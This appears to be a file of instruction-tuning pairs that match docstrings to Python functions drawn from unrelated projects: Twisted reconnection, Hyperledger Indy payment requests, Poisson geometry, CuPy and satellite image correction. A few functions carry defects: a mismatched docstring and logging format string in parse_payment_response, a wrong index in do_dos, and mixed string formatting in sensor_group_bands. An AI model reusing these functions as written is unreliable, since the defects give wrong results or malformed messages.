% + (self.endpoint, self.retries)) + return + self.retries += 1 + if delay is None: + self.delay = min(self.delay * self.factor, self.maxDelay) + if self.jitter: + self.delay = random.normalvariate(self.delay, + self.delay * self.jitter) + delay = self.delay + if self.noisy: + log.msg("Will retry %s in %g seconds" + % (self.endpoint, delay)) + def reconnector(): + proxied_factory = _RestartableProtocolFactoryProxy( + self.factory, self) + self._connectingDeferred = self.endpoint.connect(proxied_factory) + self._connectingDeferred.addCallback(self.clientConnected) + self._connectingDeferred.addErrback(self.clientConnectionFailed) + self._delayedRetry = self.clock.callLater(delay, reconnector) +[INST] Call this method after a successful connection: it resets the delay and +the retry counter.. [/INST] def resetDelay(self): + self.delay = self.initialDelay + self.retries = 0 +[INST] Process a page of keys and each subsequent page. +The keys for the current page are handed off to :meth:`fetch_page` for +processing. If there is another page, we fetch that while the current +page is being handled and add a callback to process it when the +current page is finished. + +When there are no more pages, we add a callback to close the request.. [/INST] def fetch_pages(self, keys_page, concurrency, request): + if request.connection_has_been_closed: + return + d = self.fetch_page(keys_page, concurrency, request) + if keys_page.has_next_page(): + next_page_d = keys_page.next_page() + d.addCallback(lambda _: next_page_d) + d.addCallback(self.fetch_pages, concurrency, request) + else: + d.addCallback(self.finish_request_cb, request) + return d +[INST] Process a page of keys in chunks of concurrently-fetched messages.. [/INST] def fetch_page(self, keys_page, concurrency, request): + for keys in chunks(list(keys_page), concurrency): + if request.connection_has_been_closed: + return + yield self.handle_chunk(keys, request) +[INST] Modifies Indy request by adding information how to pay fees for this transaction +according to selected payment method. + +Payment selection is performed by looking to o + +This method consumes set of UTXO inputs and outputs. The difference between inputs balance +and outputs balance is the fee for this transaction. + +Not that this method also produces correct fee signatures. + +Format of inputs is specific for payment method. Usually it should reference payment transaction +with at least one output that corresponds to payment address that user owns.. 
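+A hedged illustration of the expected call shape; the key names inside inputs_json and outputs_json are defined by the payment-method plugin (not by libindy), so the values below are placeholders only.
+ import json
+
+ async def add_fees_example(wallet_handle, submitter_did, req_json):
+     # Placeholder source/output shapes -- consult the payment plugin docs
+     # for the real key names and address formats.
+     inputs_json = json.dumps(["txo:sov:placeholder_input"])
+     outputs_json = json.dumps(
+         [{"paymentAddress": "pay:sov:placeholder_change_addr", "amount": 10}])
+     return await add_request_fees(
+         wallet_handle, submitter_did, req_json, inputs_json, outputs_json)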
[/INST] async def add_request_fees(wallet_handle: int, + submitter_did: str, + req_json: str, + inputs_json: str, + outputs_json: str) -> (str, str): + logger = logging.getLogger(__name__) + logger.debug( + "add_request_fees: >>> wallet_handle: %r, submitter_did: %r, req_json: %r, inputs_json: %r, outputs_json: %r", + wallet_handle, + submitter_did, + req_json, + inputs_json, + outputs_json) + if not hasattr(add_request_fees, "cb"): + logger.debug("add_request_fees: Creating callback") + add_request_fees.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_req_json = c_char_p(req_json.encode('utf-8')) + c_inputs_json = c_char_p(inputs_json.encode('utf-8')) + c_outputs_json = c_char_p(outputs_json.encode('utf-8')) + (req_with_fees_json, payment_method) = await do_call('indy_add_request_fees', + c_wallet_handle, + c_submitter_did, + c_req_json, + c_inputs_json, + c_outputs_json, + add_request_fees.cb) + res = (req_with_fees_json.decode(), payment_method.decode()) + logger.debug("add_request_fees: <<< res: %r", res) + return res +[INST] Parses response for Indy request with fees.. [/INST] async def parse_response_with_fees(payment_method: str, + resp_json: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("parse_response_with_fees: >>> payment_method: %r, resp_json: %r", + payment_method, + resp_json) + if not hasattr(parse_response_with_fees, "cb"): + logger.debug("parse_response_with_fees: Creating callback") + parse_response_with_fees.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + c_resp_json = c_char_p(resp_json.encode('utf-8')) + utxo_json = await do_call('indy_parse_response_with_fees', + c_payment_method, + c_resp_json, + parse_response_with_fees.cb) + res = utxo_json.decode() + logger.debug("parse_response_with_fees: <<< res: %r", res) + return res +[INST] Builds Indy request for getting UTXO list for payment address +according to this payment method.. [/INST] async def build_get_utxo_request(wallet_handle: int, + submitter_did: str, + payment_address: str) -> (str, str): + logger = logging.getLogger(__name__) + logger.debug("build_get_utxo_request: >>> wallet_handle: %r, submitter_did: %r, payment_address: %r", + wallet_handle, + submitter_did, + payment_address) + if not hasattr(build_get_utxo_request, "cb"): + logger.debug("build_get_utxo_request: Creating callback") + build_get_utxo_request.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_payment_address = c_char_p(payment_address.encode('utf-8')) + (get_utxo_txn_json, payment_method) = await do_call('indy_build_get_utxo_request', + c_wallet_handle, + c_submitter_did, + c_payment_address, + build_get_utxo_request.cb) + res = (get_utxo_txn_json.decode(), payment_method.decode()) + logger.debug("build_get_utxo_request: <<< res: %r", res) + return res +[INST] Parses response for Indy request for getting UTXO list.. 
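+For context, a minimal end-to-end sketch chaining the build and parse calls around a ledger round trip; it assumes the standard indy.ledger.sign_and_submit_request helper and placeholder handles, DIDs and payment address.
+ from indy import ledger
+
+ async def list_utxos(pool_handle, wallet_handle, submitter_did, payment_address):
+     # Build the payment-method-specific request, submit it, parse the reply.
+     req_json, payment_method = await build_get_utxo_request(
+         wallet_handle, submitter_did, payment_address)
+     resp_json = await ledger.sign_and_submit_request(
+         pool_handle, wallet_handle, submitter_did, req_json)
+     return await parse_get_utxo_response(payment_method, resp_json)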
[/INST] async def parse_get_utxo_response(payment_method: str, + resp_json: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("parse_get_utxo_response: >>> payment_method: %r, resp_json: %r", + payment_method, + resp_json) + if not hasattr(parse_get_utxo_response, "cb"): + logger.debug("parse_get_utxo_response: Creating callback") + parse_get_utxo_response.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + c_resp_json = c_char_p(resp_json.encode('utf-8')) + utxo_json = await do_call('indy_parse_get_utxo_response', + c_payment_method, + c_resp_json, + parse_get_utxo_response.cb) + res = utxo_json.decode() + logger.debug("parse_get_utxo_response: <<< res: %r", res) + return res +[INST] Builds Indy request for doing tokens payment according to this payment method. +This method consumes set of UTXO inputs and outputs. + +Format of inputs is specific for payment method. Usually it should reference payment transaction +with at least one output that corresponds to payment address that user owns.. [/INST] async def build_payment_req(wallet_handle: int, + submitter_did: str, + inputs_json: str, + outputs_json: str) -> (str, str): + logger = logging.getLogger(__name__) + logger.debug("build_payment_req: >>> wallet_handle: %r, submitter_did: %r, inputs_json: %r, outputs_json: %r", + wallet_handle, + submitter_did, + inputs_json, + outputs_json) + if not hasattr(build_payment_req, "cb"): + logger.debug("build_payment_req: Creating callback") + build_payment_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_inputs_json = c_char_p(inputs_json.encode('utf-8')) + c_outputs_json = c_char_p(outputs_json.encode('utf-8')) + (payment_req_json, payment_method) = await do_call('indy_build_payment_req', + c_wallet_handle, + c_submitter_did, + c_inputs_json, + c_outputs_json, + build_payment_req.cb) + res = (payment_req_json.decode(), payment_method.decode()) + logger.debug("build_payment_req: <<< res: %r", res) + return res +[INST] Parses response for Indy request for getting UTXO list.. [/INST] async def parse_payment_response(payment_method: str, + resp_json: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("parse_payment_response: >>> wallet_handle: %r, payment_method: %r, resp_json: %r", + payment_method, + resp_json) + if not hasattr(parse_payment_response, "cb"): + logger.debug("parse_payment_response: Creating callback") + parse_payment_response.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + c_resp_json = c_char_p(resp_json.encode('utf-8')) + utxo_json = await do_call('indy_parse_payment_response', + c_payment_method, + c_resp_json, + parse_payment_response.cb) + res = utxo_json.decode() + logger.debug("parse_payment_response: <<< res: %r", res) + return res +[INST] Builds Indy request for doing tokens minting according to this payment method. +This method consumes set of UTXO inputs and outputs. + +Format of inputs is specific for payment method. Usually it should reference payment transaction +with at least one output that corresponds to payment address that user owns.. 
[/INST] async def build_mint_req(wallet_handle: int, + submitter_did: str, + outputs_json: str) -> (str, str): + logger = logging.getLogger(__name__) + logger.debug("build_mint_req: >>> wallet_handle: %r, submitter_did: %r, outputs_json: %r", + wallet_handle, + submitter_did, + outputs_json) + if not hasattr(build_mint_req, "cb"): + logger.debug("build_mint_req: Creating callback") + build_mint_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_outputs_json = c_char_p(outputs_json.encode('utf-8')) + (mint_req_json, payment_method) = await do_call('indy_build_mint_req', + c_wallet_handle, + c_submitter_did, + c_outputs_json, + build_mint_req.cb) + res = (mint_req_json.decode(), payment_method.decode()) + logger.debug("build_mint_req: <<< res: %r", res) + return res +[INST] Builds Indy request for setting fees for transactions in the ledger. [/INST] async def build_set_txn_fees_req(wallet_handle: int, + submitter_did: str, + payment_method: str, + fees_json: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("build_set_txn_fees_req: >>> wallet_handle: %r, submitter_did: %r, payment_method: %r, fees_json: %r", + wallet_handle, + submitter_did, + payment_method, + fees_json) + if not hasattr(build_set_txn_fees_req, "cb"): + logger.debug("build_set_txn_fees_req: Creating callback") + build_set_txn_fees_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + c_fees_json = c_char_p(fees_json.encode('utf-8')) + set_txn_fees_json = await do_call('indy_build_set_txn_fees_req', + c_wallet_handle, + c_submitter_did, + c_payment_method, + c_fees_json, + build_set_txn_fees_req.cb) + res = set_txn_fees_json.decode() + logger.debug("build_set_txn_fees_req: <<< res: %r", res) + return res +[INST] Builds Indy request for getting fees for transactions in the ledger. [/INST] async def build_get_txn_fees_req(wallet_handle: int, + submitter_did: str, + payment_method: str) -> str: + logger = logging.getLogger(__name__) + logger.debug("build_get_txn_fees_req: >>> wallet_handle: %r, submitter_did: %r, payment_method: %r", + wallet_handle, + submitter_did, + payment_method) + if not hasattr(build_get_txn_fees_req, "cb"): + logger.debug("build_get_txn_fees_req: Creating callback") + build_get_txn_fees_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p)) + c_wallet_handle = c_int32(wallet_handle) + c_submitter_did = c_char_p(submitter_did.encode('utf-8')) + c_payment_method = c_char_p(payment_method.encode('utf-8')) + get_txn_fees_json = await do_call('indy_build_get_txn_fees_req', + c_wallet_handle, + c_submitter_did, + c_payment_method, + build_get_txn_fees_req.cb) + res = get_txn_fees_json.decode() + logger.debug("build_get_txn_fees_req: <<< res: %r", res) + return res +[INST] Read a csv reader iterator until a blank line is found.. [/INST] def csv_record_reader(csv_reader): + prev_row_blank = True + for row in csv_reader: + if not (len(row) == 0): + if row[0].startswith('#'): + continue + yield [cell.strip() for cell in row] + prev_row_blank = False + elif not prev_row_blank: + return +[INST] Read a reader iterator and return a list of dictionaries, each including column name and value.. 
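+A small self-contained illustration of how csv_record_reader and the dataframe helper below compose; the column names are invented for the example.
+ import csv
+ import io
+
+ raw = io.StringIO("# units table\nT, K\nQ, kg/kg\n\nrows after the blank line are ignored\n")
+ records = csv_record_reader(csv.reader(raw))
+ rows = dataframe(records, columns=['name', 'units'])
+ # rows == [{'name': 'T', 'units': 'K'}, {'name': 'Q', 'units': 'kg/kg'}]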
[/INST] def dataframe(reader, columns): + df = [] + for row in reader: + df.append(dict(zip(columns, row))) + return df +[INST] Returns a standard warning that can be placed at the top of each +generated _Fortran_ include file.. [/INST] def header(): + return """ +! ------------------- +! W A R N I N G +! ------------------- +! +! This code fragment is automatically generated by MAPL_GridCompSpecs_ACG. +! Please DO NOT edit it. Any modification made in here will be overwritten +! next time this file is auto-generated. Instead, enter your additions +! or deletions in the .rc file in the src tree. +! + """ +[INST] This method check if the dimension variable is valid for the this class. [/INST] def validate_dimension(dim): + if not isinstance(dim, int): + raise DimensionError(F"{dim} is not int") + if dim < 2: + raise DimensionError(F"{dim} < 2") + else: + return dim +[INST] Constructs the matrix of a 2-contravariant tensor field or bivector field. +Parameters. [/INST] def bivector_to_matrix(self, bivector, latex=False): + bivector_matrix = sym.zeros(self.dim + 1) + for e in bivector: + if len(set(e)) < len(e): + raise MultivectorError(F"repeated indexes {e} in {bivector}") + if len(tuple(filter(lambda x: (x <= 0), e))) > 0: + raise MultivectorError(F"invalid key {e} in {bivector}") + bivector_matrix[e] = bivector[e] + swap_e = e[::-1] + bivector_matrix[swap_e] = (-1) * bivector_matrix[e] + return sym.latex(bivector_matrix) if latex else bivector_matrix[1:, 1:] +[INST] Check if a differential 1-form alpha belongs to the kernel of a given Poisson bivector field, +that is check if P#(alpha) = 0 + +Parameters. [/INST] def is_in_kernel(self, bivector, one_form): + image = self.sharp_morphism(bivector, one_form) + if not isinstance(image, dict): + return image + return False if bool(image) else True +[INST] Check if a homogeneous Poisson bivector field is unimodular +or not. + +Parameters. [/INST] def is_unimodular_homogeneous(self, bivector): + for key in bivector: + if sym.homogeneous_order(bivector[key], *self.coords) is None: + msg = f'{key}: {bivector[key]} is not a polynomial homogeneous with respect to {self.coordinates}' + raise Nonhomogeneous(msg) + if sym.homogeneous_order(bivector[key], *self.coords) < 0: + msg = f'{key}: {bivector[key]} is not a polynomial homogeneous with respect to {self.coordinates}' + raise Nonhomogeneous(msg) + mod_vf = self.modular_vf(bivector, '1') + if not isinstance(mod_vf, dict): + return mod_vf + return False if bool(mod_vf) else True +[INST] This method compute the Gauge transformation of a Poisson bivector field. +Parameters. 
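+Throughout these methods a bivector field is encoded as a dictionary whose keys are ordered index tuples and whose values are coefficient strings. A hedged example, assuming an instance of the surrounding class built on coordinates x1, x2, x3 (the constructor is not shown in this snippet, so the call is left as a comment):
+ # Lie-Poisson bivector on R^3: {x1,x2}=x3, {x1,x3}=-x2, {x2,x3}=x1
+ bivector = {(1, 2): 'x3', (1, 3): '-x2', (2, 3): 'x1'}
+ two_form = {(1, 2): '1'}   # constant 2-form used as the gauge term
+ # gauged = instance.gauge_transformation(bivector, two_form)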
[/INST] def gauge_transformation(self, bivector, two_form, gauge_biv=True, det=False, latex=False): + if not gauge_biv and not det: + return {} + bivector_matrix = self.bivector_to_matrix(bivector) + two_form_matrix = self.bivector_to_matrix(two_form) + if not isinstance(bivector_matrix, sym.matrices.dense.MutableDenseMatrix): + return bivector_matrix + if not isinstance(two_form_matrix, sym.matrices.dense.MutableDenseMatrix): + return two_form_matrix + I_plus_deltas = [sym.eye(self.dim) + two_form_matrix.col(0) * ((-1) * bivector_matrix.row(0))] + for k in range(1, self.dim - 1): + I_plus_deltas.append(I_plus_deltas[k - 1] + two_form_matrix.col(k) * ((-1) * bivector_matrix.row(k))) + adj_I_deltas = [sym.Matrix.adjugate(e) for e in I_plus_deltas] + viT_adj_I_deltas_ui = [(((-1) * bivector_matrix.row(i)) * adj_I_deltas[i-1] * two_form_matrix.col(i))[0] for i in range(1, self.dim)] + sum_viT_adj_I_deltas_ui = sum(viT_adj_I_deltas_ui) + gauge_det = 1 + (((-1) * bivector_matrix.row(0)) * two_form_matrix.col(0))[0] + sum_viT_adj_I_deltas_ui + if det and not gauge_biv: + if latex: + return sym.latex(gauge_det) + return f"{gauge_det}" + gauge_det = sym.simplify(gauge_det) + if gauge_det == 0: + return False + BP = two_form_matrix * bivector_matrix + I_minus_BP = sym.eye(self.dim) - BP + adj_I_BP = sym.Matrix.adjugate(I_minus_BP) + inv_I_BP = (1 / gauge_det) * adj_I_BP + gauge_matrix = bivector_matrix * inv_I_BP + gauge_matrix = sym.matrices.SparseMatrix(gauge_matrix) + gauge_matrix_RL = gauge_matrix.RL + sym_gauge_bivector = {(e[0] + 1, e[1] + 1): e[2] for e in gauge_matrix_RL if e[0] < e[1]} + str_gauge_bivector = {(e[0] + 1, e[1] + 1): f"{e[2]}" for e in gauge_matrix_RL if e[0] < e[1]} + if det: + if latex: + return sym.latex(sym_gauge_bivector), sym.latex(gauge_det) + return str_gauge_bivector, f"{gauge_det}" + if latex: + return sym.latex(sym_gauge_bivector) + return str_gauge_bivector +[INST] Calculates a normal form for Lie-Poisson bivector fields on R^3 modulo linear isomorphisms. +Parameters. 
[/INST] def linear_normal_form_R3(self, bivector, latex=False): + for key in bivector: + if sym.homogeneous_order(bivector[key], *self.coords) is None: + msg = f'{key}: {bivector[key]} is not a linear polynomial with respect to {self.coordinates}' + raise Nonlinear(msg) + if sym.homogeneous_order(bivector[key], *self.coords) != 1: + msg = f'{key}: {bivector[key]} is not a linear polynomial with respect to {self.coordinates}' + raise Nonlinear(msg) + if not bool(bivector): + return {} + for e in bivector: + if len(e) != 2 or len(tuple(filter(lambda x: (x <= 0), e))) > 0: + raise MultivectorError(F'invalid key {e} in {bivector}') + if len(set(e)) < len(e): + raise MultivectorError(F'repeated indexes {e} in {bivector}') + if [bivector[e].find(f'{self.variable}') for e in bivector].count(-1) != 0: + return {} + bivector = sym.sympify(bivector) + pair_E_P = [] + for e in bivector: + if sym.simplify(e[0] * e[1] - 6) == 0: + pair_E_P.append(-self.coords[0] * bivector[e]) + if sym.simplify(e[0] * e[1] - 3) == 0: + pair_E_P.append(self.coords[1] * bivector[e]) + if sym.simplify(e[0] * e[1] - 2) == 0: + pair_E_P.append(-self.coords[2] * bivector[e]) + pair_E_P = sym.sympify('1/2') * sum(pair_E_P) + hessian_pair_E_P = sym.sympify('1/2') * sym.hessian(pair_E_P, self.coords[:3]) + rank_hess = hessian_pair_E_P.rank() + egvals_hess = [sym.re(e) for e in hessian_pair_E_P.eigenvals(rational=True, multiple=True)] + sign_hess = sum([sym.sign(e) for e in egvals_hess]) + if self.is_unimodular_homogeneous(bivector): + if sym.simplify(rank_hess - 3) == 0: + if sym.simplify(sym.Abs(sign_hess) - 3) == 0: + if latex: + return sym.latex({ + (1, 2): F'{self.coords[2]}', + (1, 3): F'-{self.coords[1]}', + (2, 3): F'{self.coords[0]}' + }) + return { + (1, 2): F'{self.coords[2]}', + (1, 3): F'-{self.coords[1]}', + (2, 3): F'{self.coords[0]}', + } + if sym.simplify(sym.Abs(sign_hess) - 1) == 0: + if latex: + return sym.latex({ + (1, 2): F'-{self.coords[2]}', + (1, 3): F'-{self.coords[1]}', + (2, 3): F'{self.coords[0]}', + }) + return { + (1, 2): F'-{self.coords[2]}', + (1, 3): F'-{self.coords[1]}', + (2, 3): F'{self.coords[0]}', + } + if sym.simplify(rank_hess - 2) == 0: + if sym.simplify(sym.Abs(sign_hess) - 2) == 0: + if latex: + return sym.latex({(1, 3): F'-{self.coords[1]}', (2, 3): F'{self.coords[0]}'}) + return {(1, 3): F'-{self.coords[1]}', (2, 3): F'{self.coords[0]}'} + if sign_hess == 0: + if latex: + return sym.latex({(1, 3): F'{self.coords[1]}', (2, 3): F'{self.coords[0]}'}) + return {(1, 3): F'{self.coords[1]}', (2, 3): F'{self.coords[0]}'} + if sym.simplify(rank_hess - 1) == 0: + if latex: + return sym.latex({(2, 3): F'{self.coords[0]}'}) + return {(2, 3): F'{self.coords[0]}'} + if rank_hess == 0: + if latex: + return sym.latex({(1, 3): F'{self.coords[0]}', (2, 3): F'{self.coords[1]}'}) + return {(1, 3): F'{self.coords[0]}', (2, 3): F'{self.coords[1]}'} + if sym.simplify(rank_hess - 2) == 0: + if sym.simplify(sym.Abs(sign_hess) - 2) == 0: + if latex: + return sym.latex({ + (1, 3): F'{self.coords[0]} - 4*a*{self.coords[1]}', + (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}', + }) + return { + (1, 3): F'{self.coords[0]} - 4*a*{self.coords[1]}', + (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}', + } + if sign_hess == 0: + if latex: + return sym.latex({ + (1, 3): F'{self.coords[0]} + 4*a*{self.coords[1]}', + (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}' + }) + return { + (1, 3): F'{self.coords[0]} + 4*a*{self.coords[1]}', + (2, 3): F'4*a*{self.coords[0]} + {self.coords[1]}' + } + if 
sym.simplify(rank_hess - 1) == 0: + if latex: + return sym.latex({(1, 3): f'{self.coords[0]}', (2, 3): f'4*{self.coords[0]} + {self.coords[1]}'}) + return {(1, 3): f'{self.coords[0]}', (2, 3): f'4*{self.coords[0]} + {self.coords[1]}'} + return {} +[INST] Determines if two Lie-Poisson bivector fields on R^3 are isomorphic or not. +Parameters. [/INST] def isomorphic_lie_poisson_R3(self, bivector_1, bivector_2): + normal_1 = self.linear_normal_form_R3(bivector_1) + normal_2 = self.linear_normal_form_R3(bivector_2) + if not bool(normal_1) and not bool(normal_2): + return True + if not isinstance(normal_1, dict): + return normal_1 + if not isinstance(normal_2, dict): + return normal_2 + if len(normal_1) - len(normal_2) != 0: + return False + if len(normal_1) - 1 == 0 and len(normal_2) - 1 == 0: + return True + normal_1 = sym.sympify(normal_1) + normal_2 = sym.sympify(normal_2) + if len(normal_1) - 2 == 0 and len(normal_2) - 2 == 0: + compare = [1 for e in normal_1 if sym.simplify(normal_1[e] - normal_2[e]) != 0] + return True if len(compare) == 0 else False + if len(normal_1) - 3 == 0 and len(normal_2) - 3 == 0: + return True if sym.simplify(normal_1[(1, 2)] - normal_2[(1, 2)]) == 0 else False + return False +[INST] Calculates de Schouten-Nijenhuis bracket of a given bivector field with himself, that is [P,P] +where [,] denote the Schouten bracket for multivector fields. + +Parameters. [/INST] def jacobiator(self, bivector, latex=False): + jac = self.coboundary_operator(bivector, bivector, latex=latex) + if not isinstance(jac, dict): + return jac + return jac +[INST] Calculates de Schouten-Nijenhuis bracket of a given bivector field with himself, +that is calculates [P,P]_SN. + +Parameters. [/INST] def is_poisson_bivector(self, bivector): + jac = self.coboundary_operator(bivector, bivector) + if not isinstance(jac, dict): + return jac + return False if bool(jac) else True +[INST] Check if a vector field is a Poisson vector field of a given Poisson bivector field, that is calculate if +[Z,P] = 0, where Z is vector_field variable and P is bivector variable. + +Parameters. [/INST] def is_poisson_vf(self, bivector, vector_field): + sch_biv_vf = self.coboundary_operator(bivector, vector_field) + if not isinstance(sch_biv_vf, dict): + return sch_biv_vf + return False if bool(sch_biv_vf) else True +[INST] Check if the sum of two Poisson bivector fields P1 and P2 is a Poisson bivector field, that is +calculate if [P1,P2] = 0 + +Parameters. [/INST] def is_poisson_pair(self, bivector_1, bivector_2): + sch_biv1_biv2 = self.coboundary_operator(bivector_1, bivector_2) + if not isinstance(sch_biv1_biv2, dict): + return sch_biv1_biv2 + return False if bool(sch_biv1_biv2) else True +[INST] scan event, It will be triggered when you scan the qrcode to login. +And it will not be triggered when you have logined. [/INST] async def on_scan(self, status: ScanStatus, qr_code: Optional[str] = None, + data: Optional[str] = None): + contact = self.Contact.load(self.contact_id) + await contact.ready() + print(f'user <{contact}> scan status: {status.name} , ' + f'qr_code: {qr_code}') +[INST] Calculate the n-th discrete difference along the given axis.. 
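+A short usage note; the values follow the familiar numpy.diff semantics, here on CuPy arrays.
+ import cupy
+
+ a = cupy.array([1, 2, 4, 7, 0])
+ diff(a)        # -> array([ 1,  2,  3, -7])
+ diff(a, n=2)   # -> array([  1,   1, -10])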
[/INST] def diff(a, n=1, axis=-1): + a = cupy.asanyarray(a) + nd = a.ndim + axis = normalize_axis_index(axis, nd) + slice1 = [slice(None)] * nd + slice2 = [slice(None)] * nd + slice1[axis] = slice(1, None) + slice2[axis] = slice(None, -1) + slice1 = tuple(slice1) + slice2 = tuple(slice2) + op = cupy.not_equal if a.dtype == cupy.bool_ else cupy.subtract + for _ in range(n): + a = op(a[slice1], a[slice2]) + return a +[INST] Perform total-variation denoising on n-dimensional images. +Parameters + +image : ndarray of ints, uints or floats +Input data to be denoised. `image` can be of any numeric type, +but it is cast into an ndarray of floats for the computation +of the denoised image. +weight : float, optional +Denoising weight. The greater `weight`, the more denoising (at +the expense of fidelity to `input`). +eps : float, optional +Relative difference of the value of the cost function that +determines the stop criterion. The algorithm stops when. + + + +n_iter_max : int, optional +Maximal number of iterations used for the optimization. +multichannel : bool, optional +Apply total-variation denoising separately for each channel. This +option should be true for color images, otherwise the denoising is +also applied in the channels dimension. + +Returns + +out : ndarray +Denoised image. + +Notes + +Make sure to set the multichannel parameter appropriately for color images. + + + +The principle of total variation denoising is to minimize the +total variation of the image, which can be roughly described as +the integral of the norm of the image gradient. Total variation +denoising tends to produce "cartoon-like" images, that is, +piecewise-constant images. + +This code is an implementation of the algorithm of Rudin, Fatemi and Osher +that was proposed by Chambolle in [1]_. + +References + +[1] A. Chambolle, An algorithm for total variation minimization and +applications, Journal of Mathematical Imaging and Vision, +Springer, 2004, 20, 89-97. + +Examples + +2D example on astronaut image. + + + +3D example on synthetic data.. [/INST] def denoise_tv_chambolle(image, weight=0.1, eps=2.e-4, n_iter_max=200, + multichannel=False): + xp = get_array_module(image) + im_type = image.dtype + if not im_type.kind == 'f': + raise NotImplementedError( + "please convert input to floating point type") + if multichannel: + out = xp.zeros_like(image) + for c in range(image.shape[-1]): + out[..., c] = _denoise_tv_chambolle_nd(image[..., c], weight, eps, + n_iter_max, xp=xp) + else: + out = _denoise_tv_chambolle_nd(image, weight, eps, n_iter_max, xp=xp) + return out +[INST] Estimate toa reflectance from radiometric data +ignoring atmospheric, topographic and BRDF effects + +Parameters + +radata : ndarray shape (nbands, ny, nx) +radiance data +mtdFile : str +path to IMD metadata file +band_ids : sequence of int +band IDs + +Returns + +ndarray +reflectance. [/INST] def toa_reflectance(radata, mtdFile, band_ids): + return reflectance.radiance_to_reflectance(radata, mtdFile, band_ids=band_ids) +[INST] Calculate TOA reflectance +Parameters + +infiles : list of str or str +paths to Landsat 8 band files +or URIs for members in TAR file +or path to TAR file +outfile : str +path to save output to +mtdfile : str +path to metadata file +bands : list of int +bands to extract from TAR file +or bands that the URIs correspond to. 
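+A hedged call sketch with hypothetical file names; the band numbers follow the Landsat 8 OLI convention.
+ toa_reflectance(
+     infiles='LC08_scene_bands.tar',
+     outfile='toa_reflectance.tif',
+     mtdfile='LC08_scene_MTL.txt',
+     bands=[2, 3, 4, 5])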
[/INST] def toa_reflectance(infiles, outfile, mtdfile, bands): + bandfiles = l8utils.get_bandfiles(infiles, bands) + reflectance.calculate_landsat_reflectance( + src_path=bandfiles, + src_mtl=mtdfile, + dst_path=outfile, + rescale_factor=None, + creation_options={}, + bands=bands, + dst_dtype='float32', + processes=1, + pixel_sunangle=True) +[INST] DOS correction using histogram with 2048 bins since WV2 has 11 bit radiometric resolution. [/INST] def do_dos(data): + nonzero = data != 0 + n = np.sum(nonzero) + tiny_fraction = n - n * 0.999999 + nbands = data.shape[0] + dosDN = np.zeros(nbands) + for i in range(nbands): + hist, edges = np.histogram( + data[i], bins=2048, range=(1, 2048), density=False) + for k in range(1, len(hist)): + if hist[k] - hist[i - 1] > tiny_fraction: + dosDN[i] = k - 1 + break + return dosDN +[INST] Adjacency correction +Parameters + + + +Sources + +Following Ouaidrari & Vermote 1999: Operational Atmospheric Correction of Landsat TM Data. [/INST] def adjacency_correction(refl, view_z, tau, T_dir, T_dif, pixel_size, radius=1.0): + rolled = False + if np.ndim(view_z) == 1: + rolled = True + refl = np.rollaxis(refl, 0, 3) + u_v = np.cos(np.radians(view_z)) + T = 1 - ((1 - T_dif) + (1 - T_dir)) + mask = np.isnan(refl) + refl[mask] = np.interp(np.flatnonzero(mask), np.flatnonzero(~mask), refl[~mask]) + sigma = radius / pixel_size + adjRefl = scipy.ndimage.filters.gaussian_filter(refl, sigma) + t_d = T_dif - np.exp(-tau / u_v) + refl = (refl * T - adjRefl * t_d) / np.exp(-tau / u_v) + refl[refl < 0.0] = 0.0 + refl[mask] = np.nan + if rolled: + return np.rollaxis(refl, 2, 0) + else: + return refl +[INST] Apply radiometric correction to Pleadis image. [/INST] def dn_to_radiance(dndata, mtdFile, band_ids): + metadata = plparser.parse_metadata(mtdFile) + gain_bias = metadata['calibration_values'] + gain, bias = (np.array(gain_bias[key])[band_ids] for key in ['gain', 'bias']) + radata = np.zeros(dndata.shape, dtype='float32') + with np.errstate(invalid='ignore'): + for i in range(radata.shape[0]): + radata[i, ...] = dndata[i] / gain[i] + bias[i] + radata[radata < 0] = 0 + return radata +[INST] Get target of sensors that have similar sets of bands. [/INST] def sensor_group_bands(sensor): + for target in ['WV', 'PHR', 'L7', 'L8', 'S2', 'WV_4band']: + if sensor_is(sensor, target): + return target + raise ValueError('Unable to get sensor group for \'%s\'.'.format(sensor)) +[INST] Sets up Py6S instance and returns job for run_sixs_for_wavelength +Parameters + +rcurves_dict : dict +sensor response curve parameters +sixs_params : dict +keyword arguments for setup_sixs + +Returns + +list of tuples (SixS, float, float, ndarray) +SixS instance +start and env wavelengths +sensor response curve. [/INST] def generate_jobs(rcurves_dict, sixs_params): + mysixs = setup_sixs(**sixs_params) + jobs = [] + for rcurve in rcurves_dict['rcurves']: + s = copy.deepcopy(mysixs) + s.wavelength = Py6S.Wavelength(rcurves_dict['start_wv'], rcurves_dict['end_wv'], rcurve) + jobs.append((s, )) + return jobs +[INST] Run sixs for a specific wavelength +Parameters + +args : tuple +initialized SixS instance +[additional args passed through] + +Returns + +dict +correction parameters +list of float +adjacency correction parameters +list +arguments passed through. 
